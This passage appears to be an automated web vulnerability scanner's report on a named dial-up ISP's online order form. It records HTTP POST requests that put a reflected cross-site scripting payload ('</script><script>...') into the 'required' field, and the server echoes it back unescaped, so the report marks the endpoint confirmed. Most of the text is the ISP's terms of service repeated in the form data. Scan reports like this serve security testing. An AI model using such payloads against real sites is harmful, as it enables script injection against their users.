the applicable user policies. Dialup 4 Less.com will provide a termination notice to you by: email addressed to your email account. All notices to you shall be deemed effective immediately. Sections 3, 9, 10, and 12 of this Agreement shall survive termination of this Agreement. 7. ACCOUNT, PASSWORD, AND SECURITY: You must keep your password confidential so that no one else may access the Services through your account. Sharing your account is prohibited, your account is for your exclusive use only. You must notify Dialup 4 Less.com immediately upon discovering any unauthorized use of your account. 8. EXTENT OF USE: An "Unlimited" access account does not constitute a dedicated connection. Dialup 4 Less.com intends it to be for an unlimited amount of time "manually" making use of the connection (ie: a individual human being sitting at a computer). This service is intended for reasonable usage. Dialup 4 Less.com employs a 10 minute inactivity timer as well as a 5 hour network cutoff timer to ensure fair access to all customers. Anyone attempting to remain on line continuously by automatically redialing after being disconnected may be cancelled in order to protect our network resources and maintain Service availability for others. 9. EMAIL USE AND SPAM: Email accounts are limited to 50MB in terms of storage. It is suggested that Emails be downloaded each time mail is fetched and stored on the server for no longer than 60 days. Dialup 4 Less.com is not responsible for any email that is lost. Using a Dialup 4 Less.com account for the purposes of sending SPAM is prohibited. Tampering with the return address or route report on an email message or Usenet newsgroup is prohibited. Anonymous transmission of any sort is prohibited. SPAM is defined as any unwanted and unsolicited transmission of data through email and usenet newsgroups. It includes but is not limited to: advertisements for goods or services, chain letters and multi-level marketing, off topic postings to mailing lists or newsgroups, any message sent to more than 5 newsgroups or 3 list owners. Any violations will be considered a breach of this agreement and will result in the immediate cancellation of all services without warning. 10. AVAILABILITY OF THE SERVICES: Dialup 4 Less.com may change its POP numbers at any time. Dialup 4 Less.com reserves the right to direct Members to use certain numbers to access the Service or to restrict use of specific access numbers. User names, passwords and email addresses are Dialup 4 Less's property and Dialup 4 Less.com may alter or replace them at any time. 11. PRIVACY POLICY: Dialup 4 Less.com will not give out your email address and/or personal information to any 3rd party entity, with the exception that if Dialup 4 Less.com is acquired, it may have to provide this information to the purchaser of the business so they can continue providing service to you. 12. DISCLAIMER OF WARRANTIES and LIMITATION OF LIABILITY. EXCEPT FOR CERTAIN PRODUCTS AND SERVICES SPECIFICALLY IDENTIFIED AS BEING OFFERED BY DialUp 4 Less.com. Dialup 4 Less.com does not control any materials, information, products, or services on the internet. The internet contains unedited materials, some of which are sexually explicit or may be offensive to you. Dialup 4 Less.com has no control over and accepts no responsibility for such materials. You assume full responsibility and risk for use of the services and the internet and are solely responsible for evaluating the accuracy, completeness, and usefulness of all services, products, and other information, and the quality and merchantability of all merchandise provided through the service or the internet. The services are provided on an "as is" and "as available" basis. Dialup 4 Less.com does not warrant that the services will be uninterrupted, error-free, or free of viruses or other harmful components. Dialup 4 Less.com makes no express warranties and waives all implied warranties including, but not limited to, warranties of title, noninfringement, merchantability, and fitness for a particular purpose regarding any merchandise, information or service provided through Dialup 4 Less.com or the internet generally. No advice or information given by Dialup 4 Less.com or its representatives shall create a warranty. Dialup 4 Less.com and its employees are not liable for any costs or damages arising directly or indirectly from your use of the services or the internet including any indirect, incidental, exemplary, multiple, special, punitive, or consequential damages. In any event, DialUp 4 Less's cumulative liability to any member for any and all claims relating to the use of the services shall not exceed the total amount of service fees paid during a one month period. 13. Indemnification: Customer agrees that it shall defend, indemnify, save and hold Dialup 4 Less harmless from any and all demands, liabilities, losses, costs and claims, including reasonable attorney's fees asserted against Dialup 4 Less.com, its agents, its customers, officers and employees, that may arise or result from any service provided or performed or agreed to be performed or any product sold by customer, its agents, employees or assigns. Customer agrees to defend, indemnify and hold harmless Dialup 4 Less.com against liabilities arising out of: (1) Any injury to person or property caused by any products sold or otherwise distributed in connection with Dialup 4 Less's server; (2) Any material supplied by customer infringing or allegedly infringing on the proprietary rights of a third party; (3) Copyright infringement and (4) Any defective products sold to customer from Dialup 4 Less 's server. 14. MISCELLANEOUS: This Agreement, and Dialup 4 Less's other user policies posted on Dialup 4 Less's Web site constitute the entire agreement between you and Dialup 4 Less.com with respect to your use of the Services. Dialup 4 Less.com may revise, amend, or modify this Agreement, and any other user policies and agreements, at any time and in any manner without prior notice.
INITIALS POST 3
orderbutton POST SUBMIT

Request

POST /dialup4less.com/cgi-bin/order.cgi HTTP/1.1
Referer: https://secure.hosting4less.com/dialup4less.com/order.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.hosting4less.com
Content-Length: 12847
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cour_listfields=value&cour_top=Thank+you+for+signing+up+with+Dialup+4+Less.com++The+following+is+%0d%0athe+information+that+was+filled+out+on+our+online+order+form.++You+wil+be+receiving+a+phone+call+to+verify+this+order+from+our+company.%0d%0aPlease+also+reply+back+to+this+email+confirming+that+the+information+is+correct.%0d%0a%0d%0aConfirmation+Info%3a&html_redirect=http%3a%2f%2fwww.dialup4less.com%2fthankyou.html&cour_send=value&print_blank_fields=value&required='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004CD)%3c%2fscript%3e&cour_bottom=Thank+You+for+choosing+Dialup+4+Less.com.+We+look+forward+to+providing+you+with+the+best+service+possible.++You+will+be+receiving+your+login+%0d%0ainformation+in+another+email+shortly.++Be+advised%2c+all+accounts+automatically+renew+until+canceled+by+faxing+or+emailing+us+a+cancelation+notice+prior+to+renewal+date.&cour_close=Sincerely%2c&cour_myname=Dialup+4+Less.com&cour_myemail=order%40dialup4less.com&cour_mywebsite=http%3a%2f%2fwww.dialup4less.com&mail_subject=Dialup+4+Less.com+Account+Sign+Up&mail_recipient=order%40dialup4less.com&mail_listfields=value&env_report=REMOTE_HOST%2cREMOTE_ADDR%2cHTTP_USER_AGENT&DESIREDUSERNAME=Ronald+Smith&DESIREDPASSWORD=3&TERM=PLAN%3a+Vacation+Dial-Up+-+Only+1+Month+(%2419.95+(%249.95%2fmo)+%26+%2410+SETUP+FEE)&NAME=Ronald+Smith&ORGANIZATION=3&ADDRESS=3&CITY=3&STATE=Select+a+State%2fprovince&ZIP=3&COUNTRY=3&PHONE=3&MOBILE-NUMBER=3&FAX=3&email=netsparker%40example.com&REPRESENTATIVE=3&PROMOTION-CODE=3&REFERER=3&CARD-HOLDER-NAME=Ronald+Smith&CREDIT-CARD-NUMBER=3&Credit Card Type=SelectPlan&CREDIT-CARD-EXPIRATION=selectyear&CreditCard Billing Address=3&billingcity=3&billingstate=3&CreditCard Billing ZipCode=3&AGREEMENT=1.+INTRODUCTION%3a%0d%0aDialup+4+Less.com+provides+its+Nationwide+Internet+Access%2c+as+they+may+exist+from+time+to+time+(%22Services%22)%2c+to+users+%0d%0awho+pay+a+quarterly%2c+semi+annual+or+annual+service+fee+to+subscribe+to+the+Services+(%22Members%22).+By+establishing+an+account%2c+you+agree+to+be+bound+by+this+Agreement+and+to+use+%0d%0athe+Services+in+compliance+with+this+Agreement%2c+our+Acceptable+Use+Policy+and+other+policies.%0d%0a%0d%0aIf+you+do+not+agree+to+the+terms+and+conditions+of+this+Agreement%2c+including+any+future+revisions%2c+we+suggest+you+not+use+our+Services.+If+you+are+a+%0d%0acurrent+Member%2c+please+terminate+your+use+of+the+Services+under+Section+6.%0d%0a%0d%0a2.+SUBSCRIPTION+REQUIREMENTS%3a%0d%0aMembers+must+be+at+least+18+years+old.+Local+access+dial-up+numbers+may+not+be+available+in+all+areas.+You+are+solely+responsible+for+determining+if+use+%0d%0aof+a+particular+dial-up+number+will+cause+you+to+incur+long-distance%2c+toll+or+other+charges.+Dialup+4+Less.com+is+not+responsible+for+any+long-distance%2c+%0d%0atoll+or+other+telecommunications+charges+you+incur.+Current+prices+for+Dialup+4+Less.com+Services+are+posted+throughout+our+website+at+%0d%0ahttp%3a%2f%2fwww.dialup4less.com+These+rates+may+also+be+obtained+by+calling+(888)+818-0444+8am+to+6pm+weekdays%2c+Pacific+Standard+Time.+Dialup+4+Less.com+%0d%0areserves+the+right+to+change+prices%2c+policies+and+institute+new+fees+and+or+policies+at+any+time.%0d%0a%0d%0a3.+PAYMENT+OBLIGATIONS+OF+A+MEMBER.%0d%0aA.+Members+must+provide+Dialup+4+Less.com+with+accurate+and+complete+billing+information+including+legal+name%2c+address%2c+telephone+number%2c+and+credit+%0d%0acard%2fbilling+information.+%0d%0a%0d%0aB.+Report+to+Dialup+4+Less.com+all+changes+to+this+information+within+five+(5)+days+of+the+change.+Members+are+responsible+for+any+changes+to+their+%0d%0aaccount.%0d%0a%0d%0aC.+Members+having+questions+regarding+charges+to+an+account%2c+should+contact+Dialup+4+Less's+Billing+Department+at+(888)+818-0444+8am+to+6pm+weekdays+%0d%0aPacific+Standard+Time.%0d%0a%0d%0a4.+CREDIT+CARD+ACCOUNTS%3a+%0d%0aAll+charges+are+automatically+billed+to+the+member's+credit+card+on+the+day+of+sign+up+and+the+first+day+of+each+billing+anniversary+month+from+that+%0d%0apoint+on+until+the+account+is+cancelled.+Once+an+account+is+set+up%2c+all+recurring+billing+will+be+on+the+first+of+the+month.+regardless+of+the+day+they+sign+up.+You+will+be+billed+%0d%0aquarterly+%2c+semi+annual+or+annual+depending+on+the+selection+you+chose+when+you+signed+up.+In+the+event+the+credit+card+is+declined+by+your+Bank%2c+the+customer+will+be+notified+by+email+or+%0d%0aphone+to+the+email%2fphone+number+on+file.+Past+due+accounts+that+are+not+brought+current+within+5+days+of+the+notice+are+subject+to+suspension+and+possible+account+termination.+There+will+be+a+%0d%0a%2420+Re-Activation+Fee+on+any+accounts+suspended+and+then+later+re-activated.+All+payments+are+non-refundable%2c+there+are+no+refunds+expressed+or+%0d%0aimplied+with+this+service.++The+company+listed+on+the+credit+card+statement+will+be+Hosting+4+Less.+Dialup+4+Less.com+will+not+be+responsible+for+any+%0d%0acharges+or+expenses+(e.g+for+overdrawn+accounts%2c+exceeding+credit+card+limits%2c+etc.)+resulting+from+charges+billed+by+Dialup+4+Less.com.%0d%0a%0d%0a5.+TERM+OF+AGREEMENT%3a+%0d%0aContinued+use+of+the+Services+constitutes+acceptance+of+this+Agreement+and+any+future+versions.+If+you+are+dissatisfied+with+the+Services+or+any+related+%0d%0aterms%2c+conditions%2c+rules%2c+policies%2c+guidelines%2c+or+practices%2c+your+sole+and+exclusive+remedy+is+to+discontinue+using+the+Services+by+terminating+your+%0d%0aaccount.%0d%0a%0d%0a6.+CANCELLATION%3a+%0d%0aYou+may+terminate+your+account+at+any+time+and+for+any+reason+by+providing+notice+of+intent+to+terminate+to+Dialup+4+Less.com+by%3a+%0d%0a%0d%0aA.++Fax%3a++Send+a+Fax+In+Writing+To+Dialup+4+Less.com+at+(818)+773-8023+With+Your+UserName+%26amp%3b+Password.%0d%0a%0d%0aB.+Email%3a+billing%40dialup4less.com.%0d%0a%0d%0aC.+To+protect+you+and+for+security+purposes%2c+all+requests+for+cancellations+or+changes+will+require+your+user+name+and+password.+Dialup+4+Less.com+may+%0d%0aterminate+this+Agreement%2c+your+password%2c+your+account%2c+or+your+use+of+the+Services%2c+for+any+reason%2c+including%2c+without+limitation%2c+if+Dialup+4+Less.com%2c+%0d%0ain+its+sole+discretion%2c+believes+you+have+violated+this+Agreement%2c+our+Acceptable+Use+Policy%2c+or+any+of+the+applicable+user+policies.+Dialup+4+Less.com+%0d%0awill+provide+a+termination+notice+to+you+by%3a+email+addressed+to+your+email+account.+All+notices+to+you+shall+be+deemed+effective+immediately.+Sections+%0d%0a3%2c+9%2c+10%2c+and+12+of+this+Agreement+shall+survive+termination+of+this+Agreement.%0d%0a%0d%0a7.+ACCOUNT%2c+PASSWORD%2c+AND+SECURITY%3a%0d%0aYou+must+keep+your+password+confidential+so+that+no+one+else+may+access+the+Services+through+your+account.+Sharing+your+account+is+prohibited%2c+your+%0d%0aaccount+is+for+your+exclusive+use+only.+You+must+notify+Dialup+4+Less.com+immediately+upon+discovering+any+unauthorized+use+of+your+account.%0d%0a%0d%0a%0d%0a8.+EXTENT+OF+USE%3a+%0d%0aAn+%22Unlimited%22+access+account+does+not+constitute+a+dedicated+connection.+Dialup+4+Less.com+intends+it+to+be+for+an%0d%0aunlimited+amount+of+time+%22manually%22+making+use+of+the+connection+(ie%3a+a+individual+human+being+sitting+at+a+computer).++This+service+is+intended%0d%0afor+reasonable+usage.++Dialup+4+Less.com+employs+a+10+minute+inactivity+%0d%0atimer+as+well+as+a+5+hour+network+cutoff+timer+to+ensure+fair%0d%0aaccess+to+all+customers.+Anyone+attempting+to+remain+on+line+continuously+by+automatically+redialing+after+being+disconnected+may+be+cancelled+in+order+%0d%0ato+protect+our+network+resources+and+maintain+Service+availability+for+%0d%0aothers.%0d%0a%0d%0a9.+EMAIL+USE+AND+SPAM%3a%0d%0aEmail+accounts+are+limited+to+50MB+in+terms+of+storage.++It+is+suggested+that+Emails+be+downloaded+each+time+mail+is+%0d%0afetched+and+stored+on+the+server+for+no+longer+than+60+days.+Dialup+4+Less.com+is+not+responsible+for+any+email+that+is+lost.%0d%0a%0d%0aUsing+a+Dialup+4+Less.com+account+for+the+purposes+of+sending+SPAM+is+prohibited.+Tampering+with+%0d%0athe+return+address+or+route+report+on+an+email+message+or+Usenet+newsgroup+is+prohibited.+Anonymous+transmission+of+any+sort+is+prohibited.%0d%0a%0d%0aSPAM+is+defined+as+any+unwanted+and+unsolicited+transmission+of+data+through+email+and+usenet+newsgroups.+It+includes+but+is+not+limited+to%3a+%0d%0aadvertisements+for+goods+or+services%2c+chain+letters+and+multi-level+marketing%2c+off+topic+postings+to+mailing+lists+or+newsgroups%2c+any+message+sent+to+%0d%0amore+than+5+newsgroups+or+3+list+owners.+%0d%0a%0d%0aAny+violations+will+be+considered+a+breach+of+this+agreement+and+will+result+in+the+immediate+cancellation+of+all+services+without+warning.%0d%0a%0d%0a10.+AVAILABILITY+OF+THE+SERVICES%3a+%0d%0aDialup+4+Less.com+may+change+its+POP+numbers+at+any+time.+Dialup+4+Less.com+reserves+the+right+to+direct+Members+to+use+certain+numbers+to+access+the+%0d%0aService+or+to+restrict+use+of+specific+access+numbers.+User+names%2c+passwords+and+email+addresses+are+Dialup+4+Less's+property+and+Dialup+4+Less.com+may+%0d%0aalter+or+replace+them+at+any+time.%0d%0a%0d%0a%0d%0a11.+PRIVACY+POLICY%3a+%0d%0aDialup+4+Less.com+will+not+give+out+your+email+address+and%2for+personal+information+to+any+3rd+party+entity%2c+with+the+exception+that+if+Dialup+4+Less.com+%0d%0ais+acquired%2c+it+may+have+to+provide+this+information+to+the+purchaser+of+the+business+so+they+can+continue+providing+service+to+you.%0d%0a%0d%0a%0d%0a12.+DISCLAIMER+OF+WARRANTIES+and+LIMITATION+OF+LIABILITY.+EXCEPT+FOR+CERTAIN+PRODUCTS+AND+SERVICES+SPECIFICALLY+IDENTIFIED+AS+BEING+OFFERED+BY+DialUp+4+%0d%0aLess.com.+%0d%0aDialup+4+Less.com+does+not+control+any+materials%2c+information%2c+products%2c+or+services+on+the+internet.+The+internet+contains+unedited+materials%2c+some+of+%0d%0awhich+are+sexually+explicit+or+may+be+offensive+to+you.+Dialup+4+Less.com+has+no+control+over+and+accepts+no+responsibility+for+such+materials.+You+%0d%0aassume+full+responsibility+and+risk+for+use+of+the+services+and+the+internet+and+are+solely+responsible+for+evaluating+the+accuracy%2c+completeness%2c+and+%0d%0ausefulness+of+all+services%2c+products%2c+and+other+information%2c+and+the+quality+and+merchantability+of+all+merchandise+provided+through+the+service+or+the+%0d%0ainternet.%0d%0a%0d%0aThe+services+are+provided+on+an+%22as+is%22+and+%22as+available%22+basis.+Dialup+4+Less.com+does+not+warrant+that+the+services+will+be+uninterrupted%2c+%0d%0aerror-free%2c+or+free+of+viruses+or+other+harmful+components.+Dialup+4+Less.com+makes+no+express+warranties+and+waives+all+implied+warranties+including%2c+%0d%0abut+not+limited+to%2c+warranties+of+title%2c+noninfringement%2c+merchantability%2c+and+fitness+for+a+particular+purpose+regarding+any+merchandise%2c+information+%0d%0aor+service+provided+through+Dialup+4+Less.com+or+the+internet+generally.+No+advice+or+information+given+by+Dialup+4+Less.com+or+its+representatives+%0d%0ashall+create+a+warranty.+Dialup+4+Less.com+and+its+employees+are+not+liable+for+any+costs+or+damages+arising+directly+or+indirectly+from+your+use+of+the+%0d%0aservices+or+the+internet+including+any+indirect%2c+incidental%2c+exemplary%2c+multiple%2c+special%2c+punitive%2c+or+consequential+damages.+In+any+event%2c+DialUp+4+%0d%0aLess's+cumulative+liability+to+any+member+for+any+and+all+claims+relating+to+the+use+of+the+services+shall+not+exceed+the+total+amount+of+service+fees+%0d%0apaid+during+a+one+month+period.%0d%0a%0d%0a13.+Indemnification%3a%0d%0aCustomer+agrees+that+it+shall+defend%2c+indemnify%2c+save+and+hold+Dialup+4+Less+harmless+from+any+and+all+demands%2c+liabilities%2c+losses%2c+costs+and+claims%2c+%0d%0aincluding+reasonable+attorney's+fees+asserted+against+Dialup+4+Less.com%2c+its+agents%2c+its+customers%2c+officers+and+employees%2c+that+may+arise+or+result+%0d%0afrom+any+service+provided+or+performed+or+agreed+to+be+performed+or+any+product+sold+by+customer%2c+its+agents%2c+employees+or+assigns.+Customer+agrees+to+%0d%0adefend%2c+indemnify+and+hold+harmless+Dialup+4+Less.com+against+liabilities+arising+out+of%3a+(1)+Any+injury+to+person+or+property+caused+by+any+products+%0d%0asold+or+otherwise+distributed+in+connection+with+Dialup+4+Less's+server%3b+(2)+Any+material+supplied+by+customer+infringing+or+allegedly+infringing+on+the+%0d%0aproprietary+rights+of+a+third+party%3b+(3)+Copyright+infringement+and+(4)+Any+defective+products+sold+to+customer+from+Dialup+4+Less+'s+server.%0d%0a%0d%0a14.+MISCELLANEOUS%3a+%0d%0aThis+Agreement%2c+and+Dialup+4+Less's+other+user+policies+posted+on+Dialup+4+Less's+Web+site+constitute+the+entire+agreement+between+you+and+Dialup+4+Less.com+with+respect+to+your+use+of+the+Services.%0d%0a%0d%0aDialup+4+Less.com+may+revise%2c+amend%2c+or+modify+this+Agreement%2c+and+any+other+user+policies+and+agreements%2c+at+any+time+and+in+any+manner+without+prior+notice.&INITIALS=3&orderbutton=SUBMIT

Response

HTTP/1.0 200 OK
Date: Fri, 18 Feb 2011 03:40:22 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 456
Connection: close
Content-Type: text/html


<html> <head> <title>Error: Invalid Submission</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Invalid Submission</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td><CENTER>The following required field(s) were invalid or blank in your submission form:<p> <ul> <li>'"--></style></script><script>netsparker(0x0004CD)</script> </ul> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form <BR> or click <a href="https://secure.hosting4less.com/dialup4less.com/order.html">here</a> for a new blank one. </CENTER> </td></tr> </table> </center> </body></html>
- /dialup4less.com/cgi-bin/order.cgi

/dialup4less.com/cgi-bin/order.cgi CONFIRMED

https://secure.hosting4less.com/dialup4less.com/cgi-bin/order.cgi

Parameters

Parameter Type Value
cour_listfields POST value
cour_top POST Thank you for signing up with Dialup 4 Less.com The following is the information that was filled out on our online order form. You wil be receiving a phone call to verify this order from our company. Please also reply back to this email confirming that the information is correct. Confirmation Info:
html_redirect POST http://www.dialup4less.com/thankyou.html
cour_send POST value
print_blank_fields POST value
required POST '"--></style></script><script>alert(0x0009B3)</script>
cour_bottom POST Thank You for choosing Dialup 4 Less.com. We look forward to providing you with the best service possible. You will be receiving your login information in another email shortly. Be advised, all accounts automatically renew until canceled by faxing or emailing us a cancelation notice prior to renewal date.
cour_close POST Sincerely,
cour_myname POST Dialup 4 Less.com
cour_myemail POST order@dialup4less.com
cour_mywebsite POST http://www.dialup4less.com
mail_subject POST Dialup 4 Less.com Account Sign Up
mail_recipient POST order@dialup4less.com
mail_listfields POST value
env_report POST REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT
DESIREDUSERNAME POST Ronald Smith
DESIREDPASSWORD POST 3
TERM POST PLAN: Vacation Dial-Up - Only 1 Month ($19.95 ($9.95/mo) & $10 SETUP FEE)
NAME POST Ronald Smith
ORGANIZATION POST 3
ADDRESS POST 3
CITY POST 3
STATE POST Select a State/province
ZIP POST 3
COUNTRY POST United States
PHONE POST 3
MOBILE-NUMBER POST 3
FAX POST 3
email POST netsparker@example.com
REPRESENTATIVE POST 3
PROMOTION-CODE POST 3
REFERER POST 3
CARD-HOLDER-NAME POST Ronald Smith
CREDIT-CARD-NUMBER POST 3
Credit+Card+Type POST SelectPlan
CREDIT-CARD-EXPIRATION POST selectmonth
CreditCard+Billing+Address POST 3
billingcity POST 3
billingstate POST 3
CreditCard+Billing+ZipCode POST 3
AGREEMENT POST 1. INTRODUCTION: Dialup 4 Less.com provides its Nationwide Internet Access, as they may exist from time to time ("Services"), to users who pay a quarterly, semi annual or annual service fee to subscribe to the Services ("Members"). By establishing an account, you agree to be bound by this Agreement and to use the Services in compliance with this Agreement, our Acceptable Use Policy and other policies. If you do not agree to the terms and conditions of this Agreement, including any future revisions, we suggest you not use our Services. If you are a current Member, please terminate your use of the Services under Section 6. 2. SUBSCRIPTION REQUIREMENTS: Members must be at least 18 years old. Local access dial-up numbers may not be available in all areas. You are solely responsible for determining if use of a particular dial-up number will cause you to incur long-distance, toll or other charges. Dialup 4 Less.com is not responsible for any long-distance, toll or other telecommunications charges you incur. Current prices for Dialup 4 Less.com Services are posted throughout our website at http://www.dialup4less.com These rates may also be obtained by calling (888) 818-0444 8am to 6pm weekdays, Pacific Standard Time. Dialup 4 Less.com reserves the right to change prices, policies and institute new fees and or policies at any time. 3. PAYMENT OBLIGATIONS OF A MEMBER. A. Members must provide Dialup 4 Less.com with accurate and complete billing information including legal name, address, telephone number, and credit card/billing information. B. Report to Dialup 4 Less.com all changes to this information within five (5) days of the change. Members are responsible for any changes to their account. C. Members having questions regarding charges to an account, should contact Dialup 4 Less's Billing Department at (888) 818-0444 8am to 6pm weekdays Pacific Standard Time. 4. CREDIT CARD ACCOUNTS: All charges are automatically billed to the member's credit card on the day of sign up and the first day of each billing anniversary month from that point on until the account is cancelled. Once an account is set up, all recurring billing will be on the first of the month. regardless of the day they sign up. You will be billed quarterly , semi annual or annual depending on the selection you chose when you signed up. In the event the credit card is declined by your Bank, the customer will be notified by email or phone to the email/phone number on file. Past due accounts that are not brought current within 5 days of the notice are subject to suspension and possible account termination. There will be a $20 Re-Activation Fee on any accounts suspended and then later re-activated. All payments are non-refundable, there are no refunds expressed or implied with this service. The company listed on the credit card statement will be Hosting 4 Less. Dialup 4 Less.com will not be responsible for any charges or expenses (e.g for overdrawn accounts, exceeding credit card limits, etc.) resulting from charges billed by Dialup 4 Less.com. 5. TERM OF AGREEMENT: Continued use of the Services constitutes acceptance of this Agreement and any future versions. If you are dissatisfied with the Services or any related terms, conditions, rules, policies, guidelines, or practices, your sole and exclusive remedy is to discontinue using the Services by terminating your account. 6. CANCELLATION: You may terminate your account at any time and for any reason by providing notice of intent to terminate to Dialup 4 Less.com by: A. Fax: Send a Fax In Writing To Dialup 4 Less.com at (818) 773-8023 With Your UserName & Password. B. Email: billing@dialup4less.com. C. To protect you and for security purposes, all requests for cancellations or changes will require your user name and password. Dialup 4 Less.com may terminate this Agreement, your password, your account, or your use of the Services, for any reason, including, without limitation, if Dialup 4 Less.com, in its sole discretion, believes you have violated this Agreement, our Acceptable Use Policy, or any of the applicable user policies. Dialup 4 Less.com will provide a termination notice to you by: email addressed to your email account. All notices to you shall be deemed effective immediately. Sections 3, 9, 10, and 12 of this Agreement shall survive termination of this Agreement. 7. ACCOUNT, PASSWORD, AND SECURITY: You must keep your password confidential so that no one else may access the Services through your account. Sharing your account is prohibited, your account is for your exclusive use only. You must notify Dialup 4 Less.com immediately upon discovering any unauthorized use of your account. 8. EXTENT OF USE: An "Unlimited" access account does not constitute a dedicated connection. Dialup 4 Less.com intends it to be for an unlimited amount of time "manually" making use of the connection (ie: a individual human being sitting at a computer). This service is intended for reasonable usage. Dialup 4 Less.com employs a 10 minute inactivity timer as well as a 5 hour network cutoff timer to ensure fair access to all customers. Anyone attempting to remain on line continuously by automatically redialing after being disconnected may be cancelled in order to protect our network resources and maintain Service availability for others. 9. EMAIL USE AND SPAM: Email accounts are limited to 50MB in terms of storage. It is suggested that Emails be downloaded each time mail is fetched and stored on the server for no longer than 60 days. Dialup 4 Less.com is not responsible for any email that is lost. Using a Dialup 4 Less.com account for the purposes of sending SPAM is prohibited. Tampering with the return address or route report on an email message or Usenet newsgroup is prohibited. Anonymous transmission of any sort is prohibited. SPAM is defined as any unwanted and unsolicited transmission of data through email and usenet newsgroups. It includes but is not limited to: advertisements for goods or services, chain letters and multi-level marketing, off topic postings to mailing lists or newsgroups, any message sent to more than 5 newsgroups or 3 list owners. Any violations will be considered a breach of this agreement and will result in the immediate cancellation of all services without warning. 10. AVAILABILITY OF THE SERVICES: Dialup 4 Less.com may change its POP numbers at any time. Dialup 4 Less.com reserves the right to direct Members to use certain numbers to access the Service or to restrict use of specific access numbers. User names, passwords and email addresses are Dialup 4 Less's property and Dialup 4 Less.com may alter or replace them at any time. 11. PRIVACY POLICY: Dialup 4 Less.com will not give out your email address and/or personal information to any 3rd party entity, with the exception that if Dialup 4 Less.com is acquired, it may have to provide this information to the purchaser of the business so they can continue providing service to you. 12. DISCLAIMER OF WARRANTIES and LIMITATION OF LIABILITY. EXCEPT FOR CERTAIN PRODUCTS AND SERVICES SPECIFICALLY IDENTIFIED AS BEING OFFERED BY DialUp 4 Less.com. Dialup 4 Less.com does not control any materials, information, products, or services on the internet. The internet contains unedited materials, some of which are sexually explicit or may be offensive to you. Dialup 4 Less.com has no control over and accepts no responsibility for such materials. You assume full responsibility and risk for use of the services and the internet and are solely responsible for evaluating the accuracy, completeness, and usefulness of all services, products, and other information, and the quality and merchantability of all merchandise provided through the service or the internet. The services are provided on an "as is" and "as available" basis. Dialup 4 Less.com does not warrant that the services will be uninterrupted, error-free, or free of viruses or other harmful components. Dialup 4 Less.com makes no express warranties and waives all implied warranties including, but not limited to, warranties of title, noninfringement, merchantability, and fitness for a particular purpose regarding any merchandise, information or service provided through Dialup 4 Less.com or the internet generally. No advice or information given by Dialup 4 Less.com or its representatives shall create a warranty. Dialup 4 Less.com and its employees are not liable for any costs or damages arising directly or indirectly from your use of the services or the internet including any indirect, incidental, exemplary, multiple, special, punitive, or consequential damages. In any event, DialUp 4 Less's cumulative liability to any member for any and all claims relating to the use of the services shall not exceed the total amount of service fees paid during a one month period. 13. Indemnification: Customer agrees that it shall defend, indemnify, save and hold Dialup 4 Less harmless from any and all demands, liabilities, losses, costs and claims, including reasonable attorney's fees asserted against Dialup 4 Less.com, its agents, its customers, officers and employees, that may arise or result from any service provided or performed or agreed to be performed or any product sold by customer, its agents, employees or assigns. Customer agrees to defend, indemnify and hold harmless Dialup 4 Less.com against liabilities arising out of: (1) Any injury to person or property caused by any products sold or otherwise distributed in connection with Dialup 4 Less's server; (2) Any material supplied by customer infringing or allegedly infringing on the proprietary rights of a third party; (3) Copyright infringement and (4) Any defective products sold to customer from Dialup 4 Less 's server. 14. MISCELLANEOUS: This Agreement, and Dialup 4 Less's other user policies posted on Dialup 4 Less's Web site constitute the entire agreement between you and Dialup 4 Less.com with respect to your use of the Services. Dialup 4 Less.com may revise, amend, or modify this Agreement, and any other user policies and agreements, at any time and in any manner without prior notice.
INITIALS POST 3
orderbutton.x POST 0
orderbutton.y POST 0

Request

POST /dialup4less.com/cgi-bin/order.cgi HTTP/1.1
Referer: https://secure.hosting4less.com/dialup4less.com/order.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.hosting4less.com
Content-Length: 12867
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cour_listfields=value&cour_top=Thank+you+for+signing+up+with+Dialup+4+Less.com++The+following+is+%0d%0athe+information+that+was+filled+out+on+our+online+order+form.++You+wil+be+receiving+a+phone+call+to+verify+this+order+from+our+company.%0d%0aPlease+also+reply+back+to+this+email+confirming+that+the+information+is+correct.%0d%0a%0d%0aConfirmation+Info%3a&html_redirect=http%3a%2f%2fwww.dialup4less.com%2fthankyou.html&cour_send=value&print_blank_fields=value&required='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0009B3)%3c%2fscript%3e&cour_bottom=Thank+You+for+choosing+Dialup+4+Less.com.+We+look+forward+to+providing+you+with+the+best+service+possible.++You+will+be+receiving+your+login+%0d%0ainformation+in+another+email+shortly.++Be+advised%2c+all+accounts+automatically+renew+until+canceled+by+faxing+or+emailing+us+a+cancelation+notice+prior+to+renewal+date.&cour_close=Sincerely%2c&cour_myname=Dialup+4+Less.com&cour_myemail=order%40dialup4less.com&cour_mywebsite=http%3a%2f%2fwww.dialup4less.com&mail_subject=Dialup+4+Less.com+Account+Sign+Up&mail_recipient=order%40dialup4less.com&mail_listfields=value&env_report=REMOTE_HOST%2cREMOTE_ADDR%2cHTTP_USER_AGENT&DESIREDUSERNAME=Ronald+Smith&DESIREDPASSWORD=3&TERM=PLAN%3a+Vacation+Dial-Up+-+Only+1+Month+(%2419.95+(%249.95%2fmo)+%26+%2410+SETUP+FEE)&NAME=Ronald+Smith&ORGANIZATION=3&ADDRESS=3&CITY=3&STATE=Select+a+State%2fprovince&ZIP=3&COUNTRY=United+States&PHONE=3&MOBILE-NUMBER=3&FAX=3&email=netsparker%40example.com&REPRESENTATIVE=3&PROMOTION-CODE=3&REFERER=3&CARD-HOLDER-NAME=Ronald+Smith&CREDIT-CARD-NUMBER=3&Credit+Card+Type=SelectPlan&CREDIT-CARD-EXPIRATION=selectmonth&C